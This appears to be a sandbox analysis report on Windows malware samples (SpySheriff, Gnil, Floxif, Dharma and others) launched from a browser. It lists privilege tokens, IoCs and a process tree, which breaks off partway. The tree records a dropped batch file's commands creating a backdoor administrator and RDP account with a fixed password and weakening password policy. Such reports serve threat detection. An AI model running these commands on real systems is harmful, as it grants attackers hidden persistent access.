Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeDebugPrivilege	3840	mssql2.exe
Token: SeIncreaseQuotaPrivilege	2684	WMIC.exe
Token: SeSecurityPrivilege	2684	WMIC.exe
Token: SeTakeOwnershipPrivilege	2684	WMIC.exe
Token: SeLoadDriverPrivilege	2684	WMIC.exe
Token: SeSystemProfilePrivilege	2684	WMIC.exe
Token: SeSystemtimePrivilege	2684	WMIC.exe
Token: SeProfSingleProcessPrivilege	2684	WMIC.exe
Token: SeIncBasePriorityPrivilege	2684	WMIC.exe
Token: SeCreatePagefilePrivilege	2684	WMIC.exe
Token: SeBackupPrivilege	2684	WMIC.exe
Token: SeRestorePrivilege	2684	WMIC.exe
Token: SeShutdownPrivilege	2684	WMIC.exe
Token: SeDebugPrivilege	2684	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2684	WMIC.exe
Token: SeRemoteShutdownPrivilege	2684	WMIC.exe
Token: SeUndockPrivilege	2684	WMIC.exe
Token: SeManageVolumePrivilege	2684	WMIC.exe
Token: 33	2684	WMIC.exe
Token: 34	2684	WMIC.exe
Token: 35	2684	WMIC.exe
Token: 36	2684	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2684	WMIC.exe
Token: SeSecurityPrivilege	2684	WMIC.exe
Token: SeTakeOwnershipPrivilege	2684	WMIC.exe
Token: SeLoadDriverPrivilege	2684	WMIC.exe
Token: SeSystemProfilePrivilege	2684	WMIC.exe
Token: SeSystemtimePrivilege	2684	WMIC.exe
Token: SeProfSingleProcessPrivilege	2684	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
3404	SpySheriff.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe

Suspicious use of SendNotifyMessage 33 IoCs

pid	Process
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
616	SearchHost.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3820	mssql.exe
3840	mssql2.exe
616	SearchHost.exe
3820	mssql.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1216 wrote to memory of 3648	1216	msedge.exe	85
PID 1216 wrote to memory of 3648	1216	msedge.exe	85
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 3948	1216	msedge.exe	86
PID 1216 wrote to memory of 4808	1216	msedge.exe	87
PID 1216 wrote to memory of 4808	1216	msedge.exe	87
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88
PID 1216 wrote to memory of 2324	1216	msedge.exe	88

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
760	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Virus
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbfd4046f8,0x7ffbfd404708,0x7ffbfd404718
  2⤵
  PID:3648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:3948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8
  2⤵
  PID:2324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:3076
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
  2⤵
  PID:4220
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5316 /prefetch:8
  2⤵
  PID:2308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
  2⤵
  PID:2668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6012 /prefetch:8
  2⤵
  PID:3680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5872 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4712
- C:\Users\Admin\Downloads\SpySheriff.exe
  "C:\Users\Admin\Downloads\SpySheriff.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:3404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
  2⤵
  PID:4416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5420 /prefetch:8
  2⤵
  PID:1292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3388
- C:\Users\Admin\Downloads\xpajB.exe
  "C:\Users\Admin\Downloads\xpajB.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  PID:2664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
  2⤵
  PID:1640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5012 /prefetch:8
  2⤵
  PID:3068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:760
- C:\Users\Admin\Downloads\Mabezat.exe
  "C:\Users\Admin\Downloads\Mabezat.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3376 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:556
- C:\Users\Admin\Downloads\Gnil.exe
  "C:\Users\Admin\Downloads\Gnil.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4776
- - C:\Windows\SysWOW64\drivers\spoclsv.exe
    C:\Windows\system32\drivers\spoclsv.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1364
- C:\Users\Admin\Downloads\Gnil.exe
  "C:\Users\Admin\Downloads\Gnil.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4820
- - C:\Windows\SysWOW64\drivers\spoclsv.exe
    C:\Windows\system32\drivers\spoclsv.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4196
- C:\Users\Admin\Downloads\Gnil.exe
  "C:\Users\Admin\Downloads\Gnil.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:632
- - C:\Windows\SysWOW64\drivers\spoclsv.exe
    C:\Windows\system32\drivers\spoclsv.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1924
- C:\Users\Admin\Downloads\Gnil.exe
  "C:\Users\Admin\Downloads\Gnil.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1252
- - C:\Windows\SysWOW64\drivers\spoclsv.exe
    C:\Windows\system32\drivers\spoclsv.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3364 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6328 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:4056
- C:\Users\Admin\Downloads\Floxif.exe
  "C:\Users\Admin\Downloads\Floxif.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:3820
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 436
    3⤵
    - Program crash
    PID:784
- C:\Users\Admin\Downloads\Floxif.exe
  "C:\Users\Admin\Downloads\Floxif.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:1284
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 400
    3⤵
    - Program crash
    PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4088 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6352 /prefetch:2
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:5012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4656 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3384 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:2440
- C:\Users\Admin\Downloads\Dharma.exe
  "C:\Users\Admin\Downloads\Dharma.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1892
- - C:\Users\Admin\Downloads\ac\nc123.exe
    "C:\Users\Admin\Downloads\ac\nc123.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3000
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      System Location Discovery: System Language Discovery
      PID:752
- - C:\Users\Admin\Downloads\ac\mssql.exe
    "C:\Users\Admin\Downloads\ac\mssql.exe"
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Impair Defenses: Safe Mode Boot
    - Suspicious behavior: LoadsDriver
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3820
- - C:\Users\Admin\Downloads\ac\mssql2.exe
    "C:\Users\Admin\Downloads\ac\mssql2.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\Shadow.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\systembackup.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1896
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
      4⤵
      System Location Discovery: System Language Discovery
      PID:408
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2684
    - - C:\Windows\SysWOW64\find.exe
        
        Find "="
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3712
  - - C:\Windows\SysWOW64\net.exe
      net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4608
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4904
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators systembackup /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:3332
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators systembackup /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4832
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
      4⤵
      System Location Discovery: System Language Discovery
      PID:3536
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3340
    - - C:\Windows\SysWOW64\find.exe
        
        Find "="
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4604
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Remote Desktop Users" systembackup /add
      4⤵
      Remote Service Session Hijacking: RDP Hijacking
      System Location Discovery: System Language Discovery
      PID:4880
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
        5⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:4800
  - - C:\Windows\SysWOW64\net.exe
      net accounts /forcelogoff:no /maxpwage:unlimited
      4⤵
      System Location Discovery: System Language Discovery
      PID:1476
    - - C:\Windows\SysWOW64\net1.exe
        
